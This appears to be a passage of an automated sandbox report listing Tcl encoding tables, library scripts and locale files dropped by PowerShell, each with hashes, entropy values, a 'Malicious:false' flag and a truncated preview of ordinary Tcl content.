                                                                                                                                                                                                                              Preview:# Encoding file: macTurkish, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8..00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC..202000B000A200A300A7202200B600DF00AE00A9212200B400A8226000C600D8..221E00B12264226500A500B522022211220F03C0222B00AA00BA03A900E600F8..00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153..20132014201C201D2018201900F725CA00FF0178011E011F01300131015E015F..202100B7201A201E2
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1115
                                                                                                                                                                                                                              Entropy (8bit):3.4157626428238723
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8TzHVBUlJvRj7SOVbusZhAMiZyi77qb+SAJlz9a4piS1yk+5yye3cJd:8PMlBVnrAMiwMm8Y6zUk+UVsJd
                                                                                                                                                                                                                              MD5:A5B48D6F2678579CBE6EA094A4655071
                                                                                                                                                                                                                              SHA1:A13A41D530B21CE8443AFD7E811286537C5BA9C7
                                                                                                                                                                                                                              SHA-256:F7E11736C9FF30102B31EC72272754110193B347433F4B364921E8F131C92BF0
                                                                                                                                                                                                                              SHA-512:612F9D528CE940B5CA9E67CB127013A104655207511F4CF39C8696A127E6A8F4867F5603DCFB78C25A55668C6EE70F2997A8D1626F6F1DD44B19260967F17097
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Encoding file: macUkraine, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0410041104120413041404150416041704180419041A041B041C041D041E041F..0420042104220423042404250426042704280429042A042B042C042D042E042F..202000B0049000A300A7202200B6040600AE00A9212204020452226004030453..221E00B122642265045600B504910408040404540407045704090459040A045A..0458040500AC221A01922248220600AB00BB202600A0040B045B040C045C0455..20132014201C201D2018201900F7201E040E045E040F045F211604010451044F..04300431043204330
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):42552
                                                                                                                                                                                                                              Entropy (8bit):3.5565924983274857
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:w/RPrUHiJrwWkyY/W2wHiwWnwWOORY+gutSX:wVUid5JCurDGSX
                                                                                                                                                                                                                              MD5:EEB45AF9D7104872FE290D1EC18AB169
                                                                                                                                                                                                                              SHA1:A80CF4EA46301F0B8B4F0BC306270D7103753871
                                                                                                                                                                                                                              SHA-256:4A15ED210126BCDAE32543F60EB1A0677F985F32D49FCE923B9FAE8C5BCF3DA4
                                                                                                                                                                                                                              SHA-512:C359042B04441AA50E536B23EEA0C6C7B2C1893DFB9CDB5459D3B46945D3BB50FD7A32A4F4E26A83622E76D3D2BB0DBBC3D1F3FB87AAF40520A243165B82AB34
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Encoding file: shiftjis, multi-byte..M..003F 0 40..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080000000000000000000850086008700000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F..FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F..FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F..FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F..0000000000000000000
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):3.73983895892791
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:SdHkUlJvRjvRV7ZQsoRmSds2AsSemxUs+Jw1Viv6ObTXyn:avlJV7ZQsoRmosGSPxU/JOm6wTXyn
                                                                                                                                                                                                                              MD5:D59E748D863A5FAEF0CEEC2564E041A3
                                                                                                                                                                                                                              SHA1:4FFF3BE37F50C090FFC581F1C7769E20281E90C3
                                                                                                                                                                                                                              SHA-256:9660537A7B62996478555C6F57C1962C78FB3972F19370B2E395C44842818A1F
                                                                                                                                                                                                                              SHA-512:BF8FD0CF1CC55564C46976F53F441B26819ADBA7AB7BB04FF3FF5A313366FC3049DF29A839CCCB05EDEF4A7ECBB49FFCA62518EDA90AF2D7781874A8435073AE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Encoding file: symbol, single-byte..S..003F 1 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002122000023220300250026220D002800292217002B002C2212002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..22450391039203A70394039503A603930397039903D1039A039B039C039D039F..03A0039803A103A303A403A503C203A9039E03A80396005B2234005D22A5005F..F8E503B103B203C703B403B503C603B303B703B903D503BA03BB03BC03BD03BF..03C003B803C103C303C403C503D603C903BE03C803B6007B007C007D223C007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..000003D2203222642044221E0192266326662665266021942190219121922193..00B000B12033226500D7221D2202202200F72260226122482026F8E6F8E721B5..21352111211C21182297229522052229222A2283228722842282228622082209..2220220700AE00A92122220F221A22C500AC2227222821D421D021D121D221D3..22C42329F8E8F8E9F8EA2
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1112
                                                                                                                                                                                                                              Entropy (8bit):3.0553142874336943
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:ZlHVBUlJvRj7SOVbusZhAMiZyi77qsDHmEU4AyqU+TWwdd:PMlBVnrAMiwMmss4AyqUSd
                                                                                                                                                                                                                              MD5:467A67DE6809B796B914F5BFF98EF46D
                                                                                                                                                                                                                              SHA1:C62418071A6C9CB0DCE3F67E130BFD2FB7AB0B58
                                                                                                                                                                                                                              SHA-256:50B62381D6EDD4219F4292BFDC365954491B23360DE7C08033E7218A3D29C970
                                                                                                                                                                                                                              SHA-512:BF98305AA7D759A087B9EABDC404714D8DC6B4F1BEED4ED0E1FFE646641E1AECA307673D64CF95FD09546D977B3409D6C04F56DCCA1D6332B0D9B6DD460B77A9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Encoding file: tis-620, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E0000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00000E010E020E030E040E050E060E070E080E090E0A0E0B0E0C0E0D0E0E0E0F..0E100E110E120E130E140E150E160E170E180E190E1A0E1B0E1C0E1D0E1E0E1F..0E200E210E220E230E240E250E260E270E280E290E2A0E2B0E2C0E2D0E2E0E2F..0E300E310E320E330E340E350E360E370E380E390E3A00000000000000000E3F..0E400E410E420E430E44
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8235
                                                                                                                                                                                                                              Entropy (8bit):4.855903177272536
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:Hf8PxPu7pUHBpqyzmY5rEk/fvs+AokFlTGHts1H/tsEGZPBtsLIVn++G:H6Pu7ELJTtyli8Ozz+L
                                                                                                                                                                                                                              MD5:8609B624CD3EC63DD02DBF89455C3A9B
                                                                                                                                                                                                                              SHA1:B3E1843E34C38AA668FFDDF435A1A65D55449CA0
                                                                                                                                                                                                                              SHA-256:5123DB837EADF45712EA7D449BC40BFD3E8E16D3D71E7D0CE9A32F164973D767
                                                                                                                                                                                                                              SHA-512:B20B75473F34209888F38EE570B8A96061760E88466DFC2EC55C814968DC7F67D92D255E8635188B60455B88F2D1D517747613AD0F366D60412D2D6ECE231B0E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# history.tcl --..#..# Implementation of the history command...#..# Copyright (c) 1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES...#.....# The tcl::history array holds the history list and some additional..# bookkeeping variables...#..# nextid.the index used for the next history list item...# keep..the max size of the history list..# oldest.the index of the oldest item in the history.....namespace eval ::tcl {.. variable history.. if {![info exists history]} {...array set history {... nextid.0... keep.20... oldest.-20...}.. }.... namespace ensemble create -command ::tcl::history -map {...add.::tcl::HistAdd...change.::tcl::HistChange...clear.::tcl::HistClear...event.::tcl::HistEvent...info.::tcl::HistInfo...keep.::tcl::HistKeep...nextid.::tcl::HistNextID...redo.::tcl::HistRedo.. }..}.....# history --..#..#.This is the main history command. See the
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10066
                                                                                                                                                                                                                              Entropy (8bit):4.806771544139381
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:kipkqA3KsZMAikGJ4kIWPa95KTBoF7dg/8YNkgQ4id:TkqWKsZ8kGJ4kIWPaDFzTd
                                                                                                                                                                                                                              MD5:C2092F8CA2D761DFA8C461076D956374
                                                                                                                                                                                                                              SHA1:90B4648B3BC81C30465B0BE83A5DB4127A1392FB
                                                                                                                                                                                                                              SHA-256:8C474095A3ABA7DF5B488F3D35240D6DE729E57153980C2A898728B8C407A727
                                                                                                                                                                                                                              SHA-512:09CE408886E2CEADDF70786A15D63AF9A930E70CAC4286AC9DDD2094C8EDCF97A2ADC2D3D2659B123F88719340D3B00D9F96E9BC7C8B55192735C290E7D24683
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# http.tcl..# Client-side HTTP for GET, POST, and HEAD commands...# These routines can be used in untrusted code that uses the Safesock..# security policy...# These procedures use a callback interface to avoid using vwait,..# which is not defined in the safe base...#..# See the http.n man page for documentation....package provide http 1.0....array set http {.. -accept */*.. -proxyhost {}.. -proxyport {}.. -useragent {Tcl http client package 1.0}.. -proxyfilter httpProxyRequired..}..proc http_config {args} {.. global http.. set options [lsort [array names http -*]].. set usage [join $options ", "].. if {[llength $args] == 0} {...set result {}...foreach name $options {... lappend result $name $http($name)...}...return $result.. }.. regsub -all -- - $options {} options.. set pat ^-([join $options |])$.. if {[llength $args] == 1} {...set flag [lindex $args 0]...if {[regexp -- $pat $flag]} {... return $http($flag)...} else {... return -code er
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):746
                                                                                                                                                                                                                              Entropy (8bit):4.711041943572035
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:jHx5XRsLzhjJS42wbGlTULuUAZb3KykszLl7+HkuRz20JSv6C3l5kMn:bHRsRJS42wbGlTUcZ+yk2Lli1z2jxXkM
                                                                                                                                                                                                                              MD5:A387908E2FE9D84704C2E47A7F6E9BC5
                                                                                                                                                                                                                              SHA1:F3C08B3540033A54A59CB3B207E351303C9E29C6
                                                                                                                                                                                                                              SHA-256:77265723959C092897C2449C5B7768CA72D0EFCD8C505BDDBB7A84F6AA401339
                                                                                                                                                                                                                              SHA-512:7AC804D23E72E40E7B5532332B4A8D8446C6447BB79B4FE32402B13836079D348998EA0659802AB0065896D4F3C06F5866C6B0D90BF448F53E803D8C243BBC63
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Tcl package index file, version 1.0..# This file is generated by the "pkg_mkIndex" command..# and sourced either when an application starts up or..# by a "package unknown" script. It invokes the..# "package ifneeded" command to set up package-related..# information so that packages will be loaded automatically..# in response to "package require" commands. When this..# script is sourced, the variable $dir must contain the..# full path name of this file's directory.....package ifneeded http 1.0 [list tclPkgSetup $dir http 1.0 {{http.tcl source {httpCopyDone httpCopyStart httpEof httpEvent httpFinish httpMapReply httpProxyRequired http_code http_config http_data http_formatQuery http_get http_reset http_size http_status http_wait}}}]..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):25633
                                                                                                                                                                                                                              Entropy (8bit):4.885492991636381
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:cXugPHudKlExBG+Xg3Qonlm6ofRRECLSQDjr5vkhzx/i:hgGdKli4eonlm6offLzehNi
                                                                                                                                                                                                                              MD5:FE92C81BB4ACDDA00761C695344D5F1E
                                                                                                                                                                                                                              SHA1:A87E1516FBD1F9751EC590273925CBC5284B16BD
                                                                                                                                                                                                                              SHA-256:7A103A85413988456C2AD615C879BBCB4D91435BCFBBE23393E0EB52B56AF6E2
                                                                                                                                                                                                                              SHA-512:C983076E420614D12AB2A7342F6F74DD5DCDAD21C7C547F660E73B74B3BE487A560ABD73213DF3F58BE3D9DBD061A12D2956CA85A58D7B9D9E40D9FA6E6C25EB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# init.tcl --..#..# Default system startup file for Tcl-based applications. Defines..# "unknown" procedure and auto-load facilities...#..# Copyright (c) 1991-1993 The Regents of the University of California...# Copyright (c) 1994-1996 Sun Microsystems, Inc...# Copyright (c) 1998-1999 Scriptics Corporation...# Copyright (c) 2004 Kevin B. Kenny. All rights reserved...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# This test intentionally written in pre-7.5 Tcl..if {[info commands package] == ""} {.. error "version mismatch: library\nscripts expect Tcl version 7.5b1 or later but the loaded version is\nonly [info patchlevel]"..}..package require -exact Tcl 8.6.13....# Compute the auto path to use in this interpreter...# The values on the path come from several locations:..#..# The environment variable TCLLIBPATH..#..# tcl_library, which is the directory containing this init.tcl script...# [t
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1038
                                                                                                                                                                                                                              Entropy (8bit):4.10054496357204
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:4EnLB383Hcm0hH9BncmtR7tK9dUVxMmALfpKIdzVJLd3xfjTuLM+vzkHWZ6tH9H0:4aR838HH9ekCkMmEfpK2xx2jiWZ0VbY
                                                                                                                                                                                                                              MD5:DA8BA1C3041998F5644382A329C3C867
                                                                                                                                                                                                                              SHA1:CA0BD787A51AD9EDC02EDD679EEEEB3A2932E189
                                                                                                                                                                                                                              SHA-256:A1EACA556BC0CFBD219376287C72D9DBBFAB76ECF9BF204FD02D40D341BAF7DA
                                                                                                                                                                                                                              SHA-512:4F086396405FDFE7FBDA7614D143DE9DB41F75BDBD3DB18B1EE9517C3DCCED238DD240B4B64829FD04E50F602DBF371D42A321D04C4C48E4B8B2A067CA1BAF2E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset af DAYS_OF_WEEK_ABBREV [list \.. "So"\.. "Ma"\.. "Di"\.. "Wo"\.. "Do"\.. "Vr"\.. "Sa"].. ::msgcat::mcset af DAYS_OF_WEEK_FULL [list \.. "Sondag"\.. "Maandag"\.. "Dinsdag"\.. "Woensdag"\.. "Donderdag"\.. "Vrydag"\.. "Saterdag"].. ::msgcat::mcset af MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Mei"\.. "Jun"\.. "Jul"\.. "Aug"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Des"\.. ""].. ::msgcat::mcset af MONTHS_FULL [list \.. "Januarie"\.. "Februarie"\.. "Maart"\.. "April"\.. "Mei"\.. "Junie"\.. "Julie"\.. "Augustus"\.. "September"\.. "Oktober"\.. "November"\.. "Desember"\.. ""].. ::msgcat::mcset af AM "VM
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.925537696653838
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xouFygMouFqF3v6ay/5ouFy9+3vR6HyFvn:4EnLB383RAgeYF3v6ay/RAI3voSVn
                                                                                                                                                                                                                              MD5:1B9DCD1C6FCDDC95AE820EA8DA5E15B8
                                                                                                                                                                                                                              SHA1:E8160353FD415BAB9FD5ACCA14E087C5E6AE836E
                                                                                                                                                                                                                              SHA-256:1548988458BBF0DFCCC23B7487CEC0E9C64E4CC8E045723E50BEC37C454A8C81
                                                                                                                                                                                                                              SHA-512:532AF060B95AED5E381B161BE56BC88D91A8F3DF2ACFD835491991F99FE752ADB4A3F93AB6D4E68F7042C28A3C1DD87A6312DFD9FFFAFD6ECE3F1B76837C5B7F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset af_ZA DATE_FORMAT "%d %B %Y".. ::msgcat::mcset af_ZA TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset af_ZA DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2018
                                                                                                                                                                                                                              Entropy (8bit):4.477377447232708
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83gr/fsS/Sm8p4M/n1KsPktE30AiJcAxi9CEzdEvSCHvMSV:43UkiSm8p3nX0EzdCSCPV
                                                                                                                                                                                                                              MD5:D264D01B46D96455715114CAEDF9F05E
                                                                                                                                                                                                                              SHA1:A3F68A4C6E69433BD53E52B73041575F3B3AC3F2
                                                                                                                                                                                                                              SHA-256:B69D0061A728D59F89FF8621312789CD9F540BF2E2ED297804D22F6278561D85
                                                                                                                                                                                                                              SHA-512:A4163DAA6821B293EADD5D499E0641A8B7C93180C710D6B364AE8681A8FF6F35EC948C8DDBE960A8466AF1ACABC15B0D465A08B084617E8005D708459F7E74D3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar DAYS_OF_WEEK_ABBREV [list \.. "\u062d"\.. "\u0646"\.. "\u062b"\.. "\u0631"\.. "\u062e"\.. "\u062c"\.. "\u0633"].. ::msgcat::mcset ar DAYS_OF_WEEK_FULL [list \.. "\u0627\u0644\u0623\u062d\u062f"\.. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\.. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\.. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\.. "\u0627\u0644\u062e\u0645\u064a\u0633"\.. "\u0627\u0644\u062c\u0645\u0639\u0629"\.. "\u0627\u0644\u0633\u0628\u062a"].. ::msgcat::mcset ar MONTHS_ABBREV [list \.. "\u064a\u0646\u0627"\.. "\u0641\u0628\u0631"\.. "\u0645\u0627\u0631"\.. "\u0623\u0628\u0631"\.. "\u0645\u0627\u064a"\.. "\u064a\u0648\u0646"\.. "\u064a\u0648\u0644"\.. "\u0623\u063a\u0633"\.. "\u0633\u0628\u062a"\..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):265
                                                                                                                                                                                                                              Entropy (8bit):4.872222510420193
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoKNvfcoKU3v6xyFjoKNo+3vfXM68vn:4EnLB3831vfD3v6g9F3vfc6+n
                                                                                                                                                                                                                              MD5:430498B4AB1E77C86BC1311A49747581
                                                                                                                                                                                                                              SHA1:684EAD965D9010C2A6E73DCACB2224FDE585F9FF
                                                                                                                                                                                                                              SHA-256:2E04B96DA002519D28125918A22FF2BB9659A668A7BCAD34D85DDDECEC8DC0B4
                                                                                                                                                                                                                              SHA-512:9F85A88A383DCFC54DAA6253D94C307A14B1CC91D5C97AF817B8122AF98025AB2430D0B2D656EBED09E78FB854D1F9CF99F3B791A6ECB7834112012739140126
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar_IN DATE_FORMAT "%A %d %B %Y".. ::msgcat::mcset ar_IN TIME_FORMAT_12 "%I:%M:%S %z".. ::msgcat::mcset ar_IN DATE_TIME_FORMAT "%A %d %B %Y %I:%M:%S %z %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1851
                                                                                                                                                                                                                              Entropy (8bit):4.08645484776227
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83sxS/Sm819+es/Ii/R91bpH0+U0c+es/Ii/R91bpH0+UO:43wiSm815MbJbHgMbJbp
                                                                                                                                                                                                                              MD5:5C62D606F4F14BC8994B28F9622D70DD
                                                                                                                                                                                                                              SHA1:E99F8CC5D330085545B05B69213E9D011D436990
                                                                                                                                                                                                                              SHA-256:5ADBB3D37C3369E5FC80D6A462C82598D5A22FAEF0E8DF6B3148231D2C6A7F73
                                                                                                                                                                                                                              SHA-512:81AC9200459B0896E27A028BD089A174F7F921B0367BC8FF1AB33D3E561417B6F8EC23DAB750ECB408AC8A11CDFDBFA4F890F9E723BB8607B017C9FEE00928A0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar_JO DAYS_OF_WEEK_ABBREV [list \.. "\u0627\u0644\u0623\u062d\u062f"\.. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\.. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\.. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\.. "\u0627\u0644\u062e\u0645\u064a\u0633"\.. "\u0627\u0644\u062c\u0645\u0639\u0629"\.. "\u0627\u0644\u0633\u0628\u062a"].. ::msgcat::mcset ar_JO MONTHS_ABBREV [list \.. "\u0643\u0627\u0646\u0648\u0646 \u0627\u0644\u062b\u0627\u0646\u064a"\.. "\u0634\u0628\u0627\u0637"\.. "\u0622\u0630\u0627\u0631"\.. "\u0646\u064a\u0633\u0627\u0646"\.. "\u0646\u0648\u0627\u0631"\.. "\u062d\u0632\u064a\u0631\u0627\u0646"\.. "\u062a\u0645\u0648\u0632"\.. "\u0622\u0628"\.. "\u0623\u064a\u0644\u0648\u0644"\.. "\u062a\u0634\u0631\u064a\u0646 \u0627\u0644\u0623\u0648\u064
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1851
                                                                                                                                                                                                                              Entropy (8bit):4.083347689510237
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83LxS/Sm8S9+es/Ii/R91bpH0+U/c+es/Ii/R91bpH0+UO:431iSm8S5MbJbQgMbJbp
                                                                                                                                                                                                                              MD5:6FC1CC738207E2F8E0871103841BC0D4
                                                                                                                                                                                                                              SHA1:D2C62C7F6DA1EF399FCBE2BA91C9562C87E6152F
                                                                                                                                                                                                                              SHA-256:1FC13070CF661488E90FECE84274C46B1F4CC7E1565EAB8F829CCAA65108DFCA
                                                                                                                                                                                                                              SHA-512:E547D5CBB746654051AFDA21942075BC2224C2FF75D440C6C34C642AD24CF622E520FF919B8BD4AFC0116D9CE69B3ABA4E81EE247C1388F3C5741150201F5C60
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar_LB DAYS_OF_WEEK_ABBREV [list \.. "\u0627\u0644\u0623\u062d\u062f"\.. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\.. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\.. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\.. "\u0627\u0644\u062e\u0645\u064a\u0633"\.. "\u0627\u0644\u062c\u0645\u0639\u0629"\.. "\u0627\u0644\u0633\u0628\u062a"].. ::msgcat::mcset ar_LB MONTHS_ABBREV [list \.. "\u0643\u0627\u0646\u0648\u0646 \u0627\u0644\u062b\u0627\u0646\u064a"\.. "\u0634\u0628\u0627\u0637"\.. "\u0622\u0630\u0627\u0631"\.. "\u0646\u064a\u0633\u0627\u0646"\.. "\u0646\u0648\u0627\u0631"\.. "\u062d\u0632\u064a\u0631\u0627\u0646"\.. "\u062a\u0645\u0648\u0632"\.. "\u0622\u0628"\.. "\u0623\u064a\u0644\u0648\u0644"\.. "\u062a\u0634\u0631\u064a\u0646 \u0627\u0644\u0623\u0648\u064
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1851
                                                                                                                                                                                                                              Entropy (8bit):4.084701680556524
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83lxS/Sm8M9+es/Ii/R91bpH0+UBc+es/Iv/I91bpH0+UO:43LiSm8M5MbJbSgMo0bp
                                                                                                                                                                                                                              MD5:8188C37CA44FEFFF8D895AAD503AD4F6
                                                                                                                                                                                                                              SHA1:C48F2E3B9FC055704D2DAFDC67E9D08EE6897D45
                                                                                                                                                                                                                              SHA-256:294F3E46C55453EDAD44567E1330F9B43E69A07FA0655B24DD2780A4490C1194
                                                                                                                                                                                                                              SHA-512:F86FCFC7C460473D46C472041AB2E1F9388CF34BCA9050295D1DAE454E35A2A0320D0C61D5E8CBB832AF74FFDD1A7511AF32EA2A53B481F39A1CBCF5F086D514
                                                                                                                                                                                                                              Malicious:false
